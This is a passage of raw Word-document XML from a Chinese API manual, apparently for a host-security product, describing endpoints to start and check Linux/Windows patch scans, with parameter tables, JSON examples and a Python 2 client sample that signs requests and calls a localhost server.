            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A3D6B3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="614780B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C8ADEF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758C7893" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28FA92CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FDE4519" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0D9144" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CCA44FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46981D38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A5BA5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74EB9DDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E13E87A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4572B75E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C5B8B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A4C024C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6100F1D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4A3225" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CF169CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34743FA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABAB844" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183BF74D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8AFC58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF9EBA"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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6679087B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C473864"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634B28C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568029A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>一个账号同时只能一个任务运行，因此调用这个接口前，应该先调用4.1.2查询状态接口，如果satus非Running，则可以创建任务，如果创建成功，则正常返回， 如果创建失败， 则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1238C383"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0E77594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6B12BD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75EBBA3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F54758C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162E6F7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52424EC4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A927AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B63EFBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F101F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE57EE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54D48FF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="查询补丁扫描执行状态"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:t>查询补丁扫描执行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2E91D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5F232" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/patch/{linux|win}/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB96153" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D77C0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BEE2D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410AC44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id":""//当前job的jobId, 如果为null, 则当前没有job执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"Running|Success|Failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD90F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EE258" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果id为null，则说明此前从未有过job执行，status为Running。如果id不为null， 则id为最近一次job执行的jobId, status为最近这次job执行的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215E0D8E"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4422"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4ADD809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03AD448" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BEEA3DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D119A6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="575DF71A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A5FBABA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E9A8954" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79933401" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3EF810" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DBF2E4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID，如果为null，则当前没有job执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73BEF24A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="058B565A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D7C79EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B5EAB5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39E07A41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行中；成功；失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F62098C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux补丁检测和状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F154C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>from __future__ import absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/v1/api/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    json_body = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method="POST", url=url, body=json_body, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print to_sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def service_patch_check_status():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/vul/patch/linux/check/status" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def is_patch_check_running():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = service_patch_check_status()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    status = data.get('status')</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return status == 'Running'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>def service_patch_check():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if not is_patch_check_running():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        start_patch_check()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def start_patch_check():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/vul/patch/linux/check" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
